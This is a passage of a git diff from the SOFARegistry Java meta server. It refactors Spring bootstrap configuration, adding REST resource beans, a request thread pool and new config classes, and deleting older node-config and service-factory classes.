- } - - @Bean - public NodeConfirmStatusService sessionConfirmStatusService() { - return new SessionConfirmStatusService(); - } - - @Bean - public RaftExchanger raftExchanger() { - return new RaftExchanger(); - } - - @Bean - public RaftAnnotationBeanPostProcessor raftAnnotationBeanPostProcessor() { - return new RaftAnnotationBeanPostProcessor(); - } - } - - @Configuration - public static class MetaServerRemotingConfiguration { - - @Bean - public Exchange boltExchange() { - return new BoltExchange(); - } - - @Bean - public Exchange jerseyExchange() { - return new JerseyExchange(); - } - - @Bean(name = "sessionServerHandlers") - public Collection sessionServerHandlers() { - Collection list = new ArrayList<>(); - list.add(sessionConnectionHandler()); - list.add(sessionNodeHandler()); - list.add(reNewNodesRequestHandler()); - list.add(getNodesRequestHandler()); - list.add(fetchProvideDataRequestHandler()); - return list; - } - - @Bean(name = "dataServerHandlers") - public Collection dataServerHandlers() { - Collection list = new ArrayList<>(); - list.add(dataConnectionHandler()); - list.add(getNodesRequestHandler()); - list.add(dataNodeHandler()); - list.add(reNewNodesRequestHandler()); - return list; - } - - @Bean(name = "metaServerHandlers") - public Collection metaServerHandlers() { - Collection list = new ArrayList<>(); - list.add(metaConnectionHandler()); - list.add(getChangeListRequestHandler()); - list.add(getNodesRequestHandler()); - return list; - } - - @Bean - public AbstractServerHandler sessionConnectionHandler() { - return new SessionConnectionHandler(); - } - - @Bean - public AbstractServerHandler dataConnectionHandler() { - return new DataConnectionHandler(); - } - - @Bean - public AbstractServerHandler metaConnectionHandler() { - return new MetaConnectionHandler(); - } - - @Bean - public AbstractServerHandler getChangeListRequestHandler() { - return new GetChangeListRequestHandler(); - } - - @Bean - public AbstractServerHandler getNodesRequestHandler() { - return new GetNodesRequestHandler(); - } - - @Bean - public AbstractServerHandler sessionNodeHandler() { - return new SessionNodeHandler(); - } - - @Bean - public AbstractServerHandler reNewNodesRequestHandler() { - return new ReNewNodesRequestHandler(); - } - - @Bean - public AbstractServerHandler dataNodeHandler() { - return new DataNodeHandler(); - } - - @Bean - public AbstractServerHandler fetchProvideDataRequestHandler() { - return new FetchProvideDataRequestHandler(); - } - - @Bean - public NodeExchanger sessionNodeExchanger() { - return new SessionNodeExchanger(); - } - - @Bean - public NodeExchanger dataNodeExchanger() { - return new DataNodeExchanger(); - } - - @Bean - public NodeExchanger metaServerExchanger() { - return new MetaServerExchanger(); - } - - @Bean - public MetaClientExchanger metaClientExchanger() { - return new MetaClientExchanger(); - } - } - - @Configuration - public static class ResourceConfiguration { - - @Bean - public ResourceConfig jerseyResourceConfig() { - ResourceConfig resourceConfig = new ResourceConfig(); - resourceConfig.register(JacksonFeature.class); - return resourceConfig; - } - - @Bean - public DecisionModeResource decisionModeResource() { - return new DecisionModeResource(); - } - - @Bean - public PersistentDataResource persistentDataResource() { - return new PersistentDataResource(); - } - - @Bean - public MetaDigestResource metaDigestResource() { - return new MetaDigestResource(); - } - - @Bean - public HealthResource healthResource() { - return new HealthResource(); - } - - @Bean - public MetaStoreResource metaStoreResource() { - return new MetaStoreResource(); - } - - @Bean - public StopPushDataResource stopPushDataResource() { - return new StopPushDataResource(); - } - } - - @Configuration - public static class MetaServerTaskConfiguration { - - @Bean - public TaskProcessor dataNodeSingleTaskProcessor() { - return new DataNodeSingleTaskProcessor(); - } - - @Bean - public TaskProcessor metaNodeSingleTaskProcessor() { - return new MetaNodeSingleTaskProcessor(); - } - - @Bean - public TaskProcessor sessionNodeSingleTaskProcessor() { - return new SessionNodeSingleTaskProcessor(); - } - - @Bean - public TaskListener sessionNodeChangePushTaskListener(TaskListenerManager taskListenerManager) { - TaskListener taskListener = new SessionNodeChangePushTaskListener( - sessionNodeSingleTaskProcessor()); - taskListenerManager.addTaskListener(taskListener); - return taskListener; - } - - @Bean - public TaskListener dataNodeChangePushTaskListener(TaskListenerManager taskListenerManager) { - TaskListener taskListener = new DataNodeChangePushTaskListener( - dataNodeSingleTaskProcessor()); - taskListenerManager.addTaskListener(taskListener); - return taskListener; - } - - @Bean - public TaskListener receiveStatusConfirmNotifyTaskListener(TaskListenerManager taskListenerManager) { - TaskListener taskListener = new ReceiveStatusConfirmNotifyTaskListener( - dataNodeSingleTaskProcessor()); - taskListenerManager.addTaskListener(taskListener); - return taskListener; - } - - @Bean - public TaskListener persistenceDataChangeNotifyTaskListener(TaskListenerManager taskListenerManager) { - TaskListener taskListener = new PersistenceDataChangeNotifyTaskListener( - sessionNodeSingleTaskProcessor()); - taskListenerManager.addTaskListener(taskListener); - return taskListener; - } - - @Bean - public TaskListenerManager taskListenerManager() { - return new DefaultTaskListenerManager(); - } - } - - @Configuration - public static class ExecutorConfiguation { - - @Bean - public ExecutorManager executorManager(MetaServerConfig metaServerConfig) { - return new ExecutorManager(metaServerConfig); - } - - } - - @Configuration - public static class MetaDBConfiguration { - @Bean - public DBService persistenceDataDBService() { - return new PersistenceDataDBService(); - } - } -} \ No newline at end of file + public StopPushDataResource stopPushDataResource() { + return new StopPushDataResource(); + } + + @Bean + public BlacklistDataResource blacklistDataResource() { + return new BlacklistDataResource(); + } + + @Bean + public SlotSyncResource renewSwitchResource() { + return new SlotSyncResource(); + } + + @Bean + public SlotTableResource slotTableResource() { + return new SlotTableResource(); + } + + @Bean + public SlotGenericResource slotResource() { + return new SlotGenericResource(); + } + + @Bean + public MetricsResource metricsResource() { + return new MetricsResource(); + } + + @Bean + public RegistryCoreOpsResource registryCoreOpsResource() { + return new RegistryCoreOpsResource(); + } + } + + @Configuration + public static class ExecutorConfiguation { + + @Bean + public ThreadPoolExecutor defaultRequestExecutor(MetaServerConfig metaServerConfig) { + ThreadPoolExecutor defaultRequestExecutor = + new MetricsableThreadPoolExecutor( + "MetaHandlerDefaultExecutor", + metaServerConfig.getDefaultRequestExecutorMinSize(), + metaServerConfig.getDefaultRequestExecutorMaxSize(), + 300, + TimeUnit.SECONDS, + new LinkedBlockingQueue<>(metaServerConfig.getDefaultRequestExecutorQueueSize()), + new NamedThreadFactory("MetaHandler-DefaultRequest")); + defaultRequestExecutor.allowCoreThreadTimeOut(true); + return defaultRequestExecutor; + } + + @Bean + public ExecutorManager executorManager(MetaServerConfig metaServerConfig) { + return new ExecutorManager(metaServerConfig); + } + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerInitializerConfiguration.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerInitializerConfiguration.java index 1add54080..95a7d04f1 100644 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerInitializerConfiguration.java +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/MetaServerInitializerConfiguration.java @@ -18,65 +18,61 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; +import java.util.concurrent.atomic.AtomicBoolean; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.context.SmartLifecycle; -import java.util.concurrent.atomic.AtomicBoolean; - /** - * * @author shangyu.wh * @version $Id: MetaServerInitializerConfiguration.java, v 0.1 2018-01-16 11:27 shangyu.wh Exp $ */ public class MetaServerInitializerConfiguration implements SmartLifecycle { - private static final Logger LOGGER = LoggerFactory - .getLogger(MetaServerInitializerConfiguration.class); - - private AtomicBoolean running = new AtomicBoolean(false); + private static final Logger LOGGER = + LoggerFactory.getLogger(MetaServerInitializerConfiguration.class); - @Autowired - private MetaServerBootstrap metaServerBootstrap; + private AtomicBoolean running = new AtomicBoolean(false); - @Override - public boolean isAutoStartup() { - return true; - } + @Autowired private MetaServerBootstrap metaServerBootstrap; - @Override - public void start() { + @Override + public boolean isAutoStartup() { + return true; + } - try { - metaServerBootstrap.doInitialized(); - LOGGER.info("Started MetaServer"); + @Override + public void start() { - MetaServerInitializerConfiguration.this.running.set(true); - } catch (Exception ex) { - MetaServerInitializerConfiguration.this.running.set(false); - LOGGER.error("Could not initialize Meta server!", ex); - } + try { + metaServerBootstrap.start(); + LOGGER.info("Started MetaServer"); + MetaServerInitializerConfiguration.this.running.set(true); + } catch (Exception ex) { + MetaServerInitializerConfiguration.this.running.set(false); + LOGGER.error("Could not initialize Meta server!", ex); } + } - @Override - public void stop() { - this.running.set(false); - metaServerBootstrap.destroy(); - } + @Override + public void stop() { + this.running.set(false); + metaServerBootstrap.destroy(); + } - @Override - public boolean isRunning() { - return this.running.get(); - } + @Override + public boolean isRunning() { + return this.running.get(); + } - @Override - public int getPhase() { - return 0; - } + @Override + public int getPhase() { + return 0; + } - @Override - public void stop(Runnable callback) { - callback.run(); - this.running.set(false); - } -} \ No newline at end of file + @Override + public void stop(Runnable callback) { + callback.run(); + this.running.set(false); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/NodeConfig.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/NodeConfig.java deleted file mode 100644 index dd8814868..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/NodeConfig.java +++ /dev/null @@ -1,63 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.bootstrap; - -import java.util.Collection; -import java.util.Map; -import java.util.Set; - -/** - * - * @author shangyu.wh - * @version $Id: NodeConfig.java, v 0.1 2018-01-23 15:00 shangyu.wh Exp $ - */ -public interface NodeConfig { - - /** - * get other metaServer node - * - * @return - */ - Map> getMetaNode(); - - /** - * get other metaServer node ip - * @return - */ - Map> getMetaNodeIP(); - - /** - * local data Center id - * @return - */ - String getLocalDataCenter(); - - /** - * get dataCenter by meta node ipAddress - * @param metaIpAddress - * @return - */ - String getMetaDataCenter(String metaIpAddress); - - /** - * get datacenter meta servers - * @param dataCenter - * @return - */ - Set getDataCenterMetaServers(String dataCenter); - -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/NodeConfigBeanProperty.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/NodeConfigBeanProperty.java deleted file mode 100644 index 4ee6a06ea..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/NodeConfigBeanProperty.java +++ /dev/null @@ -1,52 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.bootstrap; - -import org.springframework.beans.factory.annotation.Value; - -import java.util.Collection; -import java.util.Map; - -/** - * - * @author shangyu.wh - * @version $Id: NodeConfigBeanProperty.java, v 0.1 2018-05-03 16:21 shangyu.wh Exp $ - */ -public class NodeConfigBeanProperty extends AbstractNodeConfigBean { - - @Value("#{PropertySplitter.mapOfList('${nodes.metaNode}')}") - private Map> metaNode; - - @Value("${nodes.localDataCenter}") - private String localDataCenter; - - @Override - public Map> getMetaNode() { - return metaNode; - } - - /** - * Getter method for property localDataCenter. - * - * @return property value of localDataCenter - */ - @Override - public String getLocalDataCenter() { - return localDataCenter; - } - -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/ServiceFactory.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/ServiceFactory.java deleted file mode 100644 index 656324912..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/ServiceFactory.java +++ /dev/null @@ -1,78 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.bootstrap; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.server.meta.node.NodeService; -import com.alipay.sofa.registry.server.meta.remoting.connection.NodeConnectManager; -import com.alipay.sofa.registry.server.meta.store.StoreService; -import org.springframework.beans.BeansException; -import org.springframework.context.ApplicationContext; -import org.springframework.context.ApplicationContextAware; - -import java.util.HashMap; -import java.util.Map; - -/** - * - * @author shangyu.wh - * @version $Id: StoreServiceFactory.java, v 0.1 2018-01-11 22:12 shangyu.wh Exp $ - */ -public class ServiceFactory implements ApplicationContextAware { - - private static Map storeServiceMap = new HashMap<>(); - - private static Map connectManagerMap = new HashMap<>(); - - private static Map nodeServiceMap = new HashMap<>(); - - /** - * get storeservice by node type - * @param nodeType - * @return - */ - public static StoreService getStoreService(NodeType nodeType) { - return storeServiceMap.get(nodeType); - } - - /** - * get node service by node type - * @param nodeType - * @return - */ - public static NodeService getNodeService(NodeType nodeType) { - return nodeServiceMap.get(nodeType); - } - - @Override - public void setApplicationContext(ApplicationContext applicationContext) throws BeansException { - - Map map = applicationContext.getBeansOfType(StoreService.class); - - map.forEach((key, value) -> storeServiceMap.put(value.getNodeType(), value)); - - Map managerMap = applicationContext - .getBeansOfType(NodeConnectManager.class); - - managerMap.forEach((key, value) -> connectManagerMap.put(value.getNodeType(), value)); - - Map nodeServiceBeanMap = applicationContext - .getBeansOfType(NodeService.class); - - nodeServiceBeanMap.forEach((key, value) -> nodeServiceMap.put(value.getNodeType(), value)); - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/config/AbstractNodeConfigBean.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/config/AbstractNodeConfigBean.java new file mode 100644 index 000000000..f9c2a6182 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/config/AbstractNodeConfigBean.java @@ -0,0 +1,121 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.bootstrap.config; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.net.NetUtil; +import java.util.*; +import java.util.concurrent.atomic.AtomicReference; + +/** + * @author shangyu.wh + * @version $Id: AbstractNodeConfigBean.java, v 0.1 2018-05-03 16:14 shangyu.wh Exp $ + */ +public abstract class AbstractNodeConfigBean implements NodeConfig { + + private static final Logger LOGGER = LoggerFactory.getLogger(AbstractNodeConfigBean.class); + + protected Map> metaNodeIP; + + private Map dataCenterMetaIPCache = new HashMap<>(); + + /** + * Getter method for property metaNodeIP. + * + * @return property value of metaNodeIP + */ + @Override + public Map> getMetaNodeIP() { + if (metaNodeIP == null || metaNodeIP.isEmpty()) { + metaNodeIP = convertToIP(getMetaNode()); + } + return metaNodeIP; + } + + private Map> convertToIP( + Map> input) { + + Map> ret = new HashMap<>(); + try { + + if (input != null) { + input.forEach( + (dataCenter, domains) -> { + if (domains != null) { + List ipList = new ArrayList<>(); + domains.forEach( + (domain) -> { + if (domain != null) { + String ip = NetUtil.getIPAddressFromDomain(domain); + if (ip == null) { + LOGGER.error("Node config convert domain {} error!", domain); + throw new RuntimeException( + "Node config convert domain {" + domain + "} error!"); + } + ipList.add(ip); + } + }); + ret.put(dataCenter, ipList); + } + }); + } + } catch (Exception e) { + LOGGER.error("Node config convert domain error!", e); + throw new RuntimeException("Node config convert domain error!", e); + } + return ret; + } + + @Override + public String getMetaDataCenter(String metaIpAddress) { + if (metaIpAddress == null || metaIpAddress.isEmpty()) { + LOGGER.error("IpAddress:" + metaIpAddress + " cannot be null!"); + return null; + } + + String dataCenterRet = dataCenterMetaIPCache.get(metaIpAddress); + + if (dataCenterRet == null || dataCenterRet.isEmpty()) { + Map> metaList = getMetaNodeIP(); + + AtomicReference ret = new AtomicReference<>(); + metaList.forEach( + (dataCenter, list) -> { + if (list.contains(metaIpAddress)) { + ret.set(dataCenter); + } + }); + + dataCenterRet = ret.get(); + } + return dataCenterRet; + } + + @Override + public Set getDataCenterMetaServers(String dataCenterIn) { + Map> metaMap = getMetaNodeIP(); + Set metaServerIpSet = new HashSet<>(); + if (metaMap != null && metaMap.size() > 0) { + Collection list = metaMap.get(dataCenterIn); + if (list != null) { + metaServerIpSet.addAll(list); + } + } + return metaServerIpSet; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/config/MetaServerConfig.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/config/MetaServerConfig.java new file mode 100644 index 000000000..b27bd399e --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/config/MetaServerConfig.java @@ -0,0 +1,61 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.bootstrap.config; + +/** + * @author shangyu.wh + * @version $Id: MetaServerConfig.java, v 0.1 2018-01-16 10:58 shangyu.wh Exp $ + */ +public interface MetaServerConfig { + int getSessionServerPort(); + + int getDataServerPort(); + + int getMetaServerPort(); + + int getHttpServerPort(); + + int getCrossDcMetaSyncIntervalMillis(); + + int getExpireCheckIntervalMillis(); + + int getDataNodeExchangeTimeoutMillis(); + + int getSessionNodeExchangeTimeoutMillis(); + + int getMetaNodeExchangeTimeoutMillis(); + + int getDefaultRequestExecutorMinSize(); + + int getDefaultRequestExecutorMaxSize(); + + int getDefaultRequestExecutorQueueSize(); + + long getMetaLeaderWarmupMillis(); + + int getSchedulerHeartbeatIntervalSecs(); + + long getDataReplicateMaxGapMillis(); + + int getRevisionGcSilenceHour(); + + int getRevisionGcInitialDelaySecs(); + + int getRevisionGcSecs(); + + int getMetaSchedulerPoolSize(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/config/MetaServerConfigBean.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/config/MetaServerConfigBean.java new file mode 100644 index 000000000..51d142093 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/bootstrap/config/MetaServerConfigBean.java @@ -0,0 +1,418 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.bootstrap.config; + +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.metaserver.Lease; +import com.alipay.sofa.registry.util.OsUtils; +import java.util.concurrent.TimeUnit; +import org.apache.commons.lang.builder.ToStringBuilder; +import org.apache.commons.lang.builder.ToStringStyle; +import org.springframework.boot.context.properties.ConfigurationProperties; + +/** + * @author shangyu.wh + * @version $Id: MetaServerConfigBean.java, v 0.1 2018-01-16 11:01 shangyu.wh Exp $ + */ +@ConfigurationProperties(prefix = MetaServerConfigBean.PREFIX) +public class MetaServerConfigBean implements MetaServerConfig { + + public static final String PREFIX = "meta.server"; + + private int sessionServerPort = 9610; + + private int dataServerPort = 9611; + + private int metaServerPort = 9612; + + private int httpServerPort = 9615; + + private int schedulerHeartbeatIntervalSecs = 1; + + private int dataNodeExchangeTimeoutMillis = 3000; + + private int sessionNodeExchangeTimeoutMillis = 3000; + + private int metaNodeExchangeTimeoutMillis = 3000; + + private int defaultRequestExecutorMinSize = OsUtils.getCpuCount() * 5; + private int defaultRequestExecutorMaxSize = OsUtils.getCpuCount() * 10; + private int defaultRequestExecutorQueueSize = 500; + + private int expireCheckIntervalMillis = 1000; + + private int revisionGcSilenceHour = 24; + + private int revisionGcInitialDelaySecs = 60; + + private int revisionGcSecs = 60; + + private long metaLeaderWarmupMillis = + Long.getLong( + "registry.elector.warm.up.millis", + TimeUnit.SECONDS.toMillis(Lease.DEFAULT_DURATION_SECS * 3 / 2)); + + private long dataReplicateMaxGapMillis = + Long.getLong("registry.data.replicate.max.gap.millis", 3 * 60 * 1000); + + private int metaSchedulerPoolSize = OsUtils.getCpuCount(); + + /** + * Gets get session server port. + * + * @return the get session server port + */ + @Override + public int getSessionServerPort() { + return sessionServerPort; + } + + /** + * Setter method for property sessionServerPort. + * + * @param sessionServerPort value to be assigned to property sessionServerPort + */ + public void setSessionServerPort(int sessionServerPort) { + this.sessionServerPort = sessionServerPort; + } + + /** + * Gets get data server port. + * + * @return the get data server port + */ + @Override + public int getDataServerPort() { + return dataServerPort; + } + + /** + * Setter method for property dataServerPort. + * + * @param dataServerPort value to be assigned to property dataServerPort + */ + public void setDataServerPort(int dataServerPort) { + this.dataServerPort = dataServerPort; + } + + /** + * Gets get http server port. + * + * @return the get http server port + */ + @Override + public int getHttpServerPort() { + return httpServerPort; + } + + /** + * Setter method for property httpServerPort. + * + * @param httpServerPort value to be assigned to property httpServerPort + */ + public void setHttpServerPort(int httpServerPort) { + this.httpServerPort = httpServerPort; + } + + /** + * Getter method for property schedulerHeartbeatExpBackOffBound. + * + * @return property value of schedulerHeartbeatExpBackOffBound + */ + @Override + public int getExpireCheckIntervalMillis() { + return expireCheckIntervalMillis; + } + + /** + * Sets set expire check interval milli. + * + * @param expireCheckIntervalMillis the expire check interval milli + * @return the set expire check interval milli + */ + public MetaServerConfigBean setExpireCheckIntervalMillis(int expireCheckIntervalMillis) { + this.expireCheckIntervalMillis = expireCheckIntervalMillis; + return this; + } + + /** + * Getter method for property dataNodeExchangeTimeout. + * + * @return property value of dataNodeExchangeTimeout + */ + @Override + public int getDataNodeExchangeTimeoutMillis() { + return dataNodeExchangeTimeoutMillis; + } + + /** + * Setter method for property dataNodeExchangeTimeout. + * + * @param dataNodeExchangeTimeoutMillis value to be assigned to property dataNodeExchangeTimeout + */ + public void setDataNodeExchangeTimeoutMillis(int dataNodeExchangeTimeoutMillis) { + this.dataNodeExchangeTimeoutMillis = dataNodeExchangeTimeoutMillis; + } + + /** + * Getter method for property sessionNodeExchangeTimeout. + * + * @return property value of sessionNodeExchangeTimeout + */ + @Override + public int getSessionNodeExchangeTimeoutMillis() { + return sessionNodeExchangeTimeoutMillis; + } + + /** + * Setter method for property sessionNodeExchangeTimeout. + * + * @param sessionNodeExchangeTimeoutMillis value to be assigned to property + * sessionNodeExchangeTimeout + */ + public void setSessionNodeExchangeTimeoutMillis(int sessionNodeExchangeTimeoutMillis) { + this.sessionNodeExchangeTimeoutMillis = sessionNodeExchangeTimeoutMillis; + } + + /** + * Getter method for property metaServerPort. + * + * @return property value of metaServerPort + */ + @Override + public int getMetaServerPort() { + return metaServerPort; + } + + /** + * Setter method for property metaServerPort. + * + * @param metaServerPort value to be assigned to property metaServerPort + */ + public void setMetaServerPort(int metaServerPort) { + this.metaServerPort = metaServerPort; + } + + /** + * Getter method for property metaNodeExchangeTimeout. + * + * @return property value of metaNodeExchangeTimeout + */ + @Override + public int getMetaNodeExchangeTimeoutMillis() { + return metaNodeExchangeTimeoutMillis; + } + + /** + * Setter method for property metaNodeExchangeTimeout. + * + * @param metaNodeExchangeTimeoutMillis value to be assigned to property metaNodeExchangeTimeout + */ + public void setMetaNodeExchangeTimeoutMillis(int metaNodeExchangeTimeoutMillis) { + this.metaNodeExchangeTimeoutMillis = metaNodeExchangeTimeoutMillis; + } + + /** + * Gets get cross dc meta sync interval milli. + * + * @return the get cross dc meta sync interval milli + */ + @Override + public int getCrossDcMetaSyncIntervalMillis() { + return ValueConstants.CROSS_DC_META_SYNC_INTERVAL_MILLI; + } + + /** + * To string string. + * + * @return the string + */ + @Override + public String toString() { + return ToStringBuilder.reflectionToString(this, ToStringStyle.MULTI_LINE_STYLE); + } + + /** + * Gets get default request executor min size. + * + * @return the get default request executor min size + */ + @Override + public int getDefaultRequestExecutorMinSize() { + return defaultRequestExecutorMinSize; + } + + /** + * Sets set default request executor min size. + * + * @param defaultRequestExecutorMinSize the default request executor min size + */ + public void setDefaultRequestExecutorMinSize(int defaultRequestExecutorMinSize) { + this.defaultRequestExecutorMinSize = defaultRequestExecutorMinSize; + } + + /** + * Gets get default request executor max size. + * + * @return the get default request executor max size + */ + @Override + public int getDefaultRequestExecutorMaxSize() { + return defaultRequestExecutorMaxSize; + } + + /** + * Sets set default request executor max size. + * + * @param defaultRequestExecutorMaxSize the default request executor max size + */ + public void setDefaultRequestExecutorMaxSize(int defaultRequestExecutorMaxSize) { + this.defaultRequestExecutorMaxSize = defaultRequestExecutorMaxSize; + } + + /** + * Gets get default request executor queue size. + * + * @return the get default request executor queue size + */ + @Override + public int getDefaultRequestExecutorQueueSize() { + return defaultRequestExecutorQueueSize; + } + + /** + * Sets set default request executor queue size. + * + * @param defaultRequestExecutorQueueSize the default request executor queue size + */ + public void setDefaultRequestExecutorQueueSize(int defaultRequestExecutorQueueSize) { + this.defaultRequestExecutorQueueSize = defaultRequestExecutorQueueSize; + } + + @Override + public long getMetaLeaderWarmupMillis() { + return metaLeaderWarmupMillis; + } + + public void setMetaLeaderWarmupMillis(long metaLeaderWarmupMillis) { + this.metaLeaderWarmupMillis = metaLeaderWarmupMillis; + } + + /** + * Getter method for property schedulerHeartbeatIntervalSecs. + * + * @return property value of schedulerHeartbeatIntervalSecs + */ + @Override + public int getSchedulerHeartbeatIntervalSecs() { + return schedulerHeartbeatIntervalSecs; + } + + /** + * Setter method for property schedulerHeartbeatIntervalSecs. + * + * @param schedulerHeartbeatIntervalSecs value to be assigned to property + * schedulerHeartbeatIntervalSecs + */ + public void setSchedulerHeartbeatIntervalSecs(int schedulerHeartbeatIntervalSecs) { + this.schedulerHeartbeatIntervalSecs = schedulerHeartbeatIntervalSecs; + } + + public void setDataReplicateMaxGapMillis(long dataReplicateMaxGapMillis) { + this.dataReplicateMaxGapMillis = dataReplicateMaxGapMillis; + } + + @Override + public long getDataReplicateMaxGapMillis() { + return dataReplicateMaxGapMillis; + } + + /** + * Getter method for property revisionGcSilenceHour. + * + * @return property value of revisionGcSilenceHour + */ + public int getRevisionGcSilenceHour() { + return revisionGcSilenceHour; + } + + /** + * Setter method for property revisionGcSilenceHour. + * + * @param revisionGcSilenceHour value to be assigned to property revisionGcSilenceHour + */ + public void setRevisionGcSilenceHour(int revisionGcSilenceHour) { + this.revisionGcSilenceHour = revisionGcSilenceHour; + } + + /** + * Getter method for property revisionGcInitialDelaySecs. + * + * @return property value of revisionGcInitialDelaySecs + */ + @Override + public int getRevisionGcInitialDelaySecs() { + return revisionGcInitialDelaySecs; + } + + /** + * Setter method for property revisionGcInitialDelaySecs. + * + * @param revisionGcInitialDelaySecs value to be assigned to property revisionGcInitialDelaySecs + */ + public void setRevisionGcInitialDelaySecs(int revisionGcInitialDelaySecs) { + this.revisionGcInitialDelaySecs = revisionGcInitialDelaySecs; + } + + /** + * Getter method for property revisionGcSecs. + * + * @return property value of revisionGcSecs + */ + @Override + public int getRevisionGcSecs() { + return revisionGcSecs; + } + + /** + * Setter method for property revisionGcSecs. + * + * @param revisionGcSecs value to be assigned to property revisionGcSecs + */ + public void setRevisionGcSecs(int revisionGcSecs) { + this.revisionGcSecs = revisionGcSecs; + } + + /** + * Getter method for property metaSchedulerPoolSize. + * + * @return property value of metaSchedulerPoolSize + */ + @Override + public int getMetaSchedulerPoolSize() { + return metaSchedulerPoolSize; + } + + /** + * Setter method for property metaSchedulerPoolSize. + * + * @param metaSchedulerPoolSize value to be assigned to property metaSchedulerPoolSize + */ + public void setMetaSchedulerPoolSize(int metaSchedulerPoolSize) { + 